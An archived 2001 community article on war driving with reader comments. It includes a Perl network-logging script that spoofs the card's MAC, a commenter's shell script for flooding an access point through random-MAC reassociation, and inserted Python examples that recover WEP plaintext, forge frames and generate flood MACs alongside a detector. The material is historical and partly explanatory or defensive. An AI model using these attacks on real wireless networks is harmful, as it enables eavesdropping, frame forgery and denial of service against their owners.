free2air - Open Distributed Public Network Infrastructure

laptop + wireless + GPS + car = War Driving

announcement
By vortex, Section News
Posted on Tue Apr 17th, 2001 at 05:40:54 GMT
you will be assimilated ...

[UPDATE 17/4] BAWUG (pronounced BORG) hipster Evil Pete in the SF Bay Area got well-deserved cred and exposure on securityfocus.com for 802.11b war driving.

War driving (driving around an area scanning for wireless networks) is a play on the term war dialling (dialling through blocks of phone numbers looking for modems). While threads on 2600-AU were still debating whether it was even possible, events overtook them: it was already being done ...

Chris Wysopal (aka Weld Pond), head R&D honcho at @stake (formerly l0pht heavy industries), gets his foot in the door here and claims:

"it's absolutely huge" ... a grave problem. Hey ... thanks, Chris!

Despite WEP's design flaws, most other wireless systems don't even offer interoperable crypto support. Weld must have difficulty justifying his statement "802.11 is inherently less secure than other wireless technology", but he does have a strong interest in beating the scaremongering drum, as @stake has recently "added wireless auditing to their consulting menu".

Article author Kevin Poulsen then runs through the mostly academic Berkeley critique (Borisov, Goldberg and Wagner) of WEP's vulnerabilities and design flaws.

"Hardware to listen to 802.11 transmissions is readily available to attackers in the form of consumer 802.11 products," reads the paper. "The products possess all the necessary monitoring capabilities, and all that remains for attackers is to convince it to work for them."

However, the paper goes on to say that to use these capabilities most effectively, wireless card firmware hacking would be required. Only some firmware versions of some wireless cards can be put into a true monitor (RFMON) mode that captures every 802.11 frame on the channel, management frames and other stations' traffic included; a card that merely runs promiscuous while associated still only sees frames for the BSS it has joined, which is far less useful for surveying.

So far, the WEP protocol has only had an academic security paper (rightly) targeting its crypto weaknesses. free2air knows of no implemented 'sploits or published incidents of a successful crypto attack against WEP.

Update [2001-8-20 1:5:33 by vortex]: bzzz ... it's here! :-) check out Airsnort in this free2air article.

Update [2001-8-28 18:6:24 by vortex]: WEPcrack has also hit the streets.
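As an added illustration (not code from this article, from Poulsen's piece or from the Berkeley paper), the following Python works two of the design flaws that critique describes, on toy frames: keystream reuse when the 24-bit IV repeats, and ICV forgery via the linearity of CRC-32. The 40-bit key, the IVs and the payloads are constructed for the example; RC4 is implemented inline so the whole thing runs offline.

```python
"""Two WEP design flaws from the Berkeley critique, worked on toy frames.

Added example, not the article's, Poulsen's or the paper's code. The WEP-40
key, IV and payloads are constructed. WEP seeds RC4 with IV || key and appends
a CRC-32 integrity check value (ICV) to the payload before encrypting."""
import zlib

KEY = bytes.fromhex("0102030405")   # constructed WEP-40 key (never sent on air)
IV = bytes.fromhex("000001")        # 24-bit IV: only 2^24 exist, so reuse is inevitable
P1 = b"GET / HTTP/1.0\r\n"          # a frame whose contents the attacker can guess
P2 = b"attack at dawn!"             # a frame the attacker wants, sent under the same IV
ORIG = b"transfer 0010 units"       # payload to be tampered with
TAMPERED = b"transfer 9910 units"

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation), XORed onto data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(payload: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext payload, little-endian."""
    return (zlib.crc32(payload) & 0xFFFFFFFF).to_bytes(4, "little")

def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key, payload || ICV)."""
    return iv + rc4(iv + key, payload + icv(payload))

def wep_decrypt(key: bytes, frame: bytes):
    """Return the payload, or None when the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + key, body)
    payload, tag = plain[:-4], plain[-4:]
    return payload if icv(payload) == tag else None

# Flaw 1: IV reuse. Two frames under one IV share one keystream, so
# C1 xor C2 = P1 xor P2. Knowing P1 (a DHCP request, an ARP, a banner) gives
# the keystream for that IV and therefore P2, with no knowledge of the key.
def recover_via_iv_reuse(frame1: bytes, known_payload1: bytes, frame2: bytes) -> bytes:
    assert frame1[:3] == frame2[:3], "only works when the IVs collide"
    assert len(frame2) <= len(frame1), "keystream is only known up to frame1's length"
    keystream = xor(frame1[3:], known_payload1 + icv(known_payload1))
    plain2 = xor(frame2[3:], keystream)
    return plain2[:-4]                      # strip frame2's (now decrypted) ICV

# Flaw 2: CRC-32 is affine: crc(P xor D) = crc(P) xor crc(D) xor crc(0^n).
# So the attacker flips chosen payload bits in the ciphertext and patches the
# encrypted ICV by the same rule, and the frame still verifies, again keyless.
def flip_bits_in_frame(frame: bytes, delta: bytes) -> bytes:
    body = frame[3:]
    assert len(delta) == len(body) - 4, "delta must cover the whole payload"
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return frame[:3] + xor(body, delta + icv_delta)
```

The two attacks do not recover the key; that is what the later FMS-style weak-IV attacks (AirSnort, WEPCrack) added on top. What they show is that even a perfectly keyed WEP link leaks plaintext and accepts forged frames once IVs repeat, which on a busy link is a matter of hours.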

But despite the hype, one thing is for sure: there are truckloads of caveats for implementing wireless gateways in a secured corporate network.

A Co-conspirator (you know who you are ;-) and I have performed initial scans (standing relatively still) in the major London financial district of Canary Wharf, and were shocked to have detected around 150 wireless devices - most of which were not even using WEP.

Read on for technical resources on the first steps on how to become an 31337 drive-by road warrior ;-) ...

 

ok, put your geek hat on ...

For position mapping, check out the perl-gps module (GPS::Garmin, packaged as p5-GPS on FreeBSD), which talks to Garmin GPS units over a serial port.

For signal strength monitoring, combine this with Linux's iwconfig and iwspy (the wireless-tools package, already part of most modern distributions) or BSD's wicontrol utility.

Sniffing the wireless interface with tcpdump and parsing or grepping the output through a perl script will do the rest.

Evil Pete pushed the perl script below (for BSD; easy to port to the Linux wireless tools) to the BAWUG list. It logs the currently associated network's SSID, BSSID and comms quality/signal/noise against the GPS position. It should be fairly easy to hack it to record the signal strengths of all wireless nodes seen via tcpdump.
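To make the bookkeeping side of that loop concrete, here is an added Python sketch (not Evil Pete's or free2air's code; Python so it runs as-is without the BSD card and driver). It parses wicontrol(8)-style status dumps using the same field labels the Perl script's regexes match on, skips the not-associated sentinel BSSID the script skips, takes the GPS fix as plain lat/lon floats (the script reads them from GPS::Garmin), and tallies what a drive saw: distinct networks and how many had WEP off. The status dumps, MAC addresses and coordinates are constructed for this example.

```python
"""Bookkeeping side of a war-driving loop, as testable functions.

Added example, not Evil Pete's or free2air's code. Status dumps, MACs and
coordinates below are constructed; field labels follow the Perl script."""
import re
from dataclasses import dataclass
from typing import Optional

NULL_BSSID = "44:44:44:44:44:44"   # what the card reports when not associated

FIELD_PATTERNS = {                 # same regexes as the Perl script's scan()
    "ssid":      re.compile(r"^Current netname \(SSID\):\s+\[(.*)\]$"),
    "bssid":     re.compile(r"^Current BSSID:\s+\[(.*)\]$"),
    "comms":     re.compile(r"^Comms.*\[(.*)\]$"),
    "wep":       re.compile(r"^WEP encryption:\s+\[(.*)\]$"),
    "port_type": re.compile(r"^Port type.*\s+\[(.*)\]$"),
}

@dataclass
class Sighting:
    lat: float
    lon: float
    ssid: str
    bssid: str
    mode: str                 # "BSS" (infrastructure) or "ad-hoc"
    wep: bool
    quality: Optional[int]    # the three numbers of "Comms quality/signal/noise"
    signal: Optional[int]
    noise: Optional[int]

def parse_wicontrol(text: str) -> dict:
    """Pull the fields of interest out of a wicontrol status dump."""
    fields = {}
    for line in text.splitlines():
        for name, pat in FIELD_PATTERNS.items():
            m = pat.match(line.rstrip())
            if m:
                fields[name] = m.group(1).strip()
    return fields

def make_sighting(wico_text: str, lat: float, lon: float) -> Optional[Sighting]:
    """One log record for the network the card is currently associated with,
    or None when it is not associated (empty or sentinel BSSID)."""
    f = parse_wicontrol(wico_text)
    bssid = f.get("bssid", "")
    if not bssid or bssid == NULL_BSSID:
        return None
    quality = signal = noise = None
    comms = f.get("comms", "").split()
    if len(comms) == 3 and all(x.isdigit() for x in comms):
        quality, signal, noise = (int(x) for x in comms)
    return Sighting(lat=lat, lon=lon, ssid=f.get("ssid", ""), bssid=bssid.lower(),
                    mode="BSS" if f.get("port_type") == "1" else "ad-hoc",
                    wep=f.get("wep", "Off") != "Off",
                    quality=quality, signal=signal, noise=noise)

def survey(samples) -> dict:
    """samples: iterable of (wicontrol_text, lat, lon). Keeps, per BSSID, the
    sighting with the strongest signal, the best guess at where the AP is."""
    best = {}
    for text, lat, lon in samples:
        s = make_sighting(text, lat, lon)
        if s is None:
            continue
        cur = best.get(s.bssid)
        if cur is None or (s.signal or 0) > (cur.signal or 0):
            best[s.bssid] = s
    return best

def summarize(best: dict) -> dict:
    """The Canary Wharf style tally: how many networks, how many with WEP off."""
    return {"networks": len(best),
            "without_wep": sum(1 for s in best.values() if not s.wep),
            "ad_hoc": sum(1 for s in best.values() if s.mode == "ad-hoc")}

def _dump(ssid, bssid, comms, port, wep):
    # Constructed wicontrol-style status dump (only the lines the parser reads)
    return (f"Current netname (SSID):              [ {ssid} ]\n"
            f"Desired netname (SSID):              [  ]\n"
            f"Current BSSID:                       [ {bssid} ]\n"
            f"Comms quality/signal/noise:          [ {comms} ]\n"
            f"Port type (1=BSS, 3=ad-hoc):         [ {port} ]\n"
            f"WEP encryption:                      [ {wep} ]\n")

# Constructed drive: one AP seen twice (second fix is stronger), one spot with
# nothing in range, and an ad-hoc network that does have WEP turned on.
SAMPLES = [
    (_dump("linksys", "00:04:5A:11:22:33", "12 45 30", 1, "Off"), 51.5050, -0.0240),
    (_dump("linksys", "00:04:5A:11:22:33", "34 61 27", 1, "Off"), 51.5054, -0.0235),
    (_dump("", NULL_BSSID, "0 0 0", 1, "Off"), 51.5060, -0.0220),
    (_dump("tradefloor", "02:AA:BB:CC:DD:EE", "20 50 30", 3, "On"), 51.5047, -0.0198),
]
```

Feeding survey() the real dumps, one per fix, gives the per-BSSID table a range map would be plotted from; keeping the strongest-signal fix per BSSID is what makes the "where is that AP" guess usable.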

more soon on this as I hack the script for Linux - post your comments and adventures here too ...

.vortex

Evil Pete's BSD perl script:

#!/usr/bin/perl
#
# requires p5-GPS (freebsd:/usr/ports/astro/p5-GPS )
# this is tested with a Garmin eMAP
#
# Todo: 
#        reset card to the way we found it?
#        not print repeating data

#use strict;

use GPS::Garmin;


#init shit

$|=1;

my $shutoff_GPS = 0;     # may cause an error; pity there is no way to power the GPS back on.
my $use_gps = 1;
#my $gps_device = "/dev/ttyd0";
my $gps_device = "/dev/cuaa0";

my $delay        = 5; # seconds

my $wicomm       = '/usr/sbin/wicontrol';
my $gps;

my ($save_station_name, $save_desired_name, $save_mac_addr);
my ($save_power_mgmt, $save_web_crypt, $save_port_type);

#--



sub save_card_conf {

    open(WICO, "$wicomm|") or die "$wicomm Error: $!";
    while (<WICO>) {
         chomp;
         $save_station_name = $1         if /^Station name:\s+\[(.*)\]$/;
         $save_desired_name = $1         if /^Desired netname.*\[(.*)\]$/;
         $save_mac_addr = $1     if /^MAC address:\s+\[(.*)\]$/;
         $save_power_mgmt = $1   if /^Power Mgmt.*\s+\[(.*)\]$/;
         $save_web_crypt = $1    if /^WEP encryption:\s+\[(.*)\]$/;
         $save_port_type = $1    if /^Port type.*\s+\[(.*)\]$/;
    }
    close (WICO);

    if ($save_web_crypt =~ /Off/) { 
            $save_web_crypt = 0;
    } else {
            $save_web_crypt = 1;
    }

    #$save_desired_name = "ANY" if ($save_desired_name =~ /^\s+$/) ;
    $save_desired_name = "" if ($save_desired_name =~ /^\s+$/) ;

    #print "save_station_name \"$save_station_name\"\n";
    #print "save_desired_name \"$save_desired_name\"\n";
    #print "save_mac_addr \"$save_mac_addr\"\n";
    #print "save_power_mgmt \"$save_power_mgmt\"\n";
    #print "save_web_crypt \"$save_web_crypt\"\n";
    #print "save_port_type \"$save_port_type\"\n";

    return;
}

sub initialize {

    print "Initializing....\n";

    print "\tSaving WLAN card configuration\n";
    save_card_conf;

    $SIG{'INT'} = "shut_it_down";
    $SIG{'QUIT'} = "shut_it_down";

    print "\treconfigurating WLAN card\n";
    system("$wicomm -n \"\"");                   # "ANY" should work but it doesn't
    system("$wicomm -s 'WLAN Scan'");            # Better than the default
    system("$wicomm -p1");                       # Port type BSS
    system("$wicomm -P0");                       # no power save
    system("$wicomm -e0");                       # no encryption
    system("$wicomm -m DE:AD:DE:AD:DE:AD");      # humor me...


    # Sadly we can't just probe to see if there is a GPS attached
    # the library will call "die()" for us if it fails..
    if ($use_gps) {
            print "\tAccessing GPS....\n";
            $gps= new GPS::Garmin ( 'Port' => $gps_device,
                         'Baud' => 9600,
                         ) or warn "Unable to connect to GPS receiver: $!";
    }

    print "\tDone.\n";

    return;
}

sub print_header {
my ($sec,$min,$hour,$mday,$mon,$year);
my ($prod_id, $soft_ver, $prod_desc);

    print "My Info:\n\t";
    open(WICO, "$wicomm|") or die "$wicomm Error: $!";
    while (<WICO>) {
         chomp;
         print "Name=\"",$1,"\"\t" if /^Station name:\s+\[(.*)\]$/;
         print "MAC=",$1,"\t" if /^MAC address:\s+\[(.*)\]$/;
         print "Serial=",$1,"\t" if /^NIC serial number.*\[(.*)\]$/;
         #print $1,"\t" if /^Comms.*\[(.*)\]$/;
    }
    close(WICO);

    print "\n";

    if ($use_gps) {
         ($prod_id, $soft_ver, $prod_desc) = $gps->get_product_id;
         print "GPS Info:\n\t$prod_id\t$soft_ver\t$prod_desc\n\n";

         print "Current Time  GPS/SYS (GMT):\t";
            ($sec,$min,$hour,$mday,$mon,$year) = $gps->get_time;
            print "$hour\:$min\:$sec\t";
    } else {
         print "NO GPS\t";
    }

    ($sec,$min,$hour,$mday,$mon,$year) = gmtime(time);
    printf "%2.2d:%2.2d:%2.2d\n", $hour, $min, $sec;

    print "\n\n\n\n";

    return;
}



sub scan {
my ($netname, $curr_bssid, $comm_stat,  $ap_density, $port_type);
my ($latsign,$lat,$lnsign,$lon) = ("", 0, "", 0);   # sensible defaults when there is no GPS
my ($sec,$min,$hour,$mday,$mon,$year);

    while (1) {
         $netname = $curr_bssid = $comm_stat = $ap_density = "";
         open(WICO, "$wicomm|") or die "$wicomm Error: $!";
         while (<WICO>) {
                 chomp;
                 $netname = $1   if /^Current netname \(SSID\):\s+\[(.*)\]$/;
                 $curr_bssid = $1        if /^Current BSSID:\s+\[(.*)\]$/;
                 $comm_stat = $1         if /^Comms.*\[(.*)\]$/;
                 $ap_density = $1        if /^Access point.*\[(.*)\]$/;
                 $port_type = $1                 if /^Port type.*\s+\[(.*)\]$/;
         }
         close (WICO);

         if (( $curr_bssid =~ /44:44:44:44:44:44/) || ( length($curr_bssid) == 0 )) {

            print "<",$curr_bssid,">\t";

            #print "44 MAC\n" if ( $curr_bssid =~ /^44:44:44:44:44:44/) ;
            #print "NULL Id\n" if ( length($curr_bssid) == 0 );

            print "SKIPPED\n\n";

         } else { 

            if ($use_gps) {
                 ($latsign,$lat,$lnsign,$lon) = $gps->get_position;
            }

            printf "$latsign %4.9f \t $lnsign %4.9f", $lat, $lon;

            print "\t($netname)\n";

            print "\t",  ($port_type == 1 ? "BSS" : "ad-hoc")   ;
            print "\t(",$curr_bssid,")";

            print "\n";

            #($sec,$min,$hour,$mday,$mon,$year) = $gps->get_time;
            ($sec,$min,$hour,$mday,$mon,$year) = gmtime(time);
            printf "\t%2.2d:%2.2d:%2.2d (GMT)", $hour, $min, $sec;


            print "\t",$comm_stat;
            #print "\t",$ap_density;

            print "\n\n";

         }

         system("$wicomm -p1");  # reset the SSID?
         sleep $delay;
   }
}

sub restore_card_conf{
    print "Restoring card conf\n";

    system("$wicomm -n \"$save_desired_name\"");
    system("$wicomm -s \"$save_station_name\"");
    system("$wicomm -p$save_port_type");
    system("$wicomm -P$save_power_mgmt");
    system("$wicomm -e$save_web_crypt");
    system("$wicomm -m $save_mac_addr");

    print "save_station_name \"$save_station_name\"\n";
    print "save_desired_name \"$save_desired_name\"\n";
    print "save_mac_addr \"$save_mac_addr\"\n";
    print "save_power_mgmt \"$save_power_mgmt\"\n";
    print "save_web_crypt \"$save_web_crypt\"\n";
    print "save_port_type \"$save_port_type\"\n";

    return;
}

sub clean_up {

    restore_card_conf;

    if ($shutoff_GPS > 0) {
         print "powering GPS down\n";
        $gps->power_off;
    }
}

sub shut_it_down {
    
    print "shutting down\n"; 

    clean_up;

    exit;
}

sub main {


    initialize;

    print_header;

    scan;

    clean_up;

    exit(0);
}


main;

exit;

laptop + wireless + GPS + car = War Driving | 5 comments (5 topical, editorial, 0 pending)
f2a node range bandwidth/signal maps none (#1)
by abulafia (ten.ria2eerf@aifaluba) on Sat Apr 14th, 2001 at 08:48:06 GMT

Does anyone know a method to take the data from a script like this and put it into the form of a pretty node range map?

It would be great for f2a nodes to know what range and connection speeds they can expect in their neck of the woods.

It would even help folks find the best place to mount their antenna by plotting a few different likely fixture points.


et in arcadia ego


 
May want to link to the 2600-AU threads themselves none (#3)
by Anonymous Hero on Mon May 21st, 2001 at 04:24:11 GMT

The list archives are at:

http://www.2600.org.au/cgi-bin/archive

I mention this because while it sounds like someone claimed it wasn't possible, there are those of us on the list that know that it is :P

You may want to link to the postings that specifically claim it's "not possible" just to be clear that not everyone agrees.




Re: 2600-AU none (#4)
by vortex (gro.ria2eerf@xetrov) on Wed Jun 6th, 2001 at 10:11:07 GMT

Thanks. I want to say now that I've truly appreciated 2600-AU for many years.

And I especially realise that the core participants are very skilled in their areas.

It's a busy list - if I get around to finding the specific postings, I'll link to the articles themselves.

In the meantime, I urge people to subscribe and participate in 2600-AU.




.vortex


 
AP Flooding none (#5)
by vortex (gro.ria2eerf@xetrov) on Wed Aug 15th, 2001 at 08:05:59 GMT


---------- Forwarded message ----------
Date: Tue, 14 Aug 2001 15:08:26 -0800 (AKDT)
From: Xam R Time <xam@archimedes.shmoo.com>
To: tsg@shmoo.com
Subject: wicontrol stuff

can anyone else flood their AP using this too?

I can, so far.

#!/bin/sh
#
#Idea by Xam
#Code ideas by TheChump  and Atropos
#mail xam@tacoshell.wi2600.org if desired
#Enjoy!

#clear our card

wicontrol -n ""
sleep .5
wicontrol -s ""
sleep .5
wicontrol -q ""

#main loop for creating our MAC address, and then sets it.
#on a PII-400 laptop, .5 seconds is about enough for the 802.11
#card to be set & for it to reassociate to a linksys bridge. Card
#happens to be a WPC 11 with sprint 2001 firmware, you will need
#to adjust this. mail me with a sleep interval that works for
#your card/access points.

while true
do
        #first octet: keep bit 0 clear (unicast) and set bit 1 (locally
        #administered). a fully random first octet is a multicast address
        #half the time, which is not a valid station address and some
        #cards/APs refuse it.
        first=`jot -r 1 0 63`
        first=$(( (first << 2) | 2 ))
        rest=`jot -r -w "%0.2x" -s : 5 0 255`
        addy=`printf "%02x:%s" $first $rest`
        echo $addy
        #I like to have this here to observe its workings

        sleep .5
        #sleep for half a second, this may not work on some systems

        wicontrol -i wi0 -m $addy
        #calls wicontrol(8) to set the new MAC address
        #the card then will reassociate. and then again.
        #and again. and then again. get the idea?
done


.vortex
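For the other side of that trick: what the access point sees is a never-ending stream of brand-new station MACs associating every half second, which is easy to tell from normal roaming. The Python below is an added example (not from the forwarded mail or from free2air) of both halves: it generates the same kind of random MACs, but with the first octet forced to unicast and locally administered, and it runs a simple new-station-rate detector over association events. The event tuples and the normal-roaming sample are constructed; the window and threshold are assumptions to tune per site, and no real AP log format is implied.

```python
"""MAC-churn association flood: generator and AP-side detector.

Added example, not code from the forwarded mail or from free2air. Events are
constructed (seconds, event, station MAC) tuples, not a real AP log format;
window and threshold are assumptions."""
import random
from collections import deque

def random_unicast_laa_mac(rng: random.Random) -> str:
    """Random MAC like the shell loop's, first octet forced to unicast
    (bit 0 clear) and locally administered (bit 1 set)."""
    first = (rng.randrange(256) & 0xFC) | 0x02
    octets = [first] + [rng.randrange(256) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in octets)

def is_unicast_laa(mac: str) -> bool:
    first = int(mac.split(":")[0], 16)
    return (first & 0x01) == 0 and (first & 0x02) != 0

def flood_events(n: int, start: float = 0.0, interval: float = 0.5, seed: int = 1):
    """What the flooding script produces as seen by the AP: a fresh station
    MAC associating every `interval` seconds."""
    rng = random.Random(seed)
    return [(start + i * interval, "assoc", random_unicast_laa_mac(rng)) for i in range(n)]

# Constructed baseline: three laptops roaming and re-associating over ten minutes.
NORMAL_EVENTS = [
    (0.0, "assoc", "00:02:2d:aa:00:01"), (95.0, "assoc", "00:02:2d:aa:00:02"),
    (140.0, "assoc", "00:04:5a:bb:00:03"), (300.0, "assoc", "00:02:2d:aa:00:01"),
    (420.0, "assoc", "00:02:2d:aa:00:02"), (590.0, "assoc", "00:04:5a:bb:00:03"),
]

def detect_mac_churn(events, window: float = 60.0, threshold: int = 10):
    """Return (time, count) for the first moment more than `threshold`
    never-before-seen station MACs have associated within `window` seconds,
    else None. Re-associations by known stations are ignored, so ordinary
    roaming does not trip it; a MAC-churn flood trips it within seconds."""
    seen = set()
    recent = deque()
    for t, ev, mac in sorted(events):
        if ev != "assoc" or mac in seen:
            continue
        seen.add(mac)
        recent.append(t)
        while recent and recent[0] < t - window:
            recent.popleft()
        if len(recent) > threshold:
            return (t, len(recent))
    return None
```

The detector keys on first-seen MACs rather than association count on purpose: a flapping client re-associates a lot but with one address, whereas the flood never repeats one.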


Where have the 150 wireless devices gone ? none (#6)
by notty (notty@suidroot.org) on Tue Oct 9th, 2001 at 11:55:26 GMT

Walking past Canary Wharf the other day with my Lucent antenna I decided to check out the 150 free wireless devices described in this article. To my amazement, after 30 minutes of searching all we got was 1 measly packet... just 1. Any idea where they have gone?



 